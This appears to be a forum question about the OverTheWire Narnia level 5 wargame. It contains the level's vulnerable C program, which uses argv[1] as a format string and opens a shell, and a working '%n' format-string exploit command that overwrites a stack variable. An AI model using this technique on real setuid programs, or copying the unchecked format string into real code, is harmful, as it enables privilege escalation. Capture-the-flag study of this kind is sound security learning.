#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
int i = 1;
char buffer[64];
snprintf(buffer, sizeof buffer, argv[1]);
buffer[sizeof (buffer) - 1] = 0;
printf("Change i's value from 1 -> 500. ");
if(i==500){
printf("GOOD\n");
setreuid(geteuid(),geteuid());
system("/bin/sh");
}
printf("No way...let me give you a hint!\n");
printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
printf ("i = %d (%p)\n", i, &i);
return 0;
}
Hi! I'm working on ctf exercise(Overthewire 5 level, Narnia). Here is the code that I've tried, but I don't understand why second option isn't working.
This one works
./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%1$n"')
With this I get SegFault
./narnia5 $(python -c 'print "\xe0\xd6\xff\xff" + "%496x%n"')
The principle is the same in both variants, you pass the address and %n specifier reads amount of bytes passed, because address takes 4 bytes we add 496 bytes with padding. In both of them %n will read next address on the stack, as I understand. Thanks, for your answers.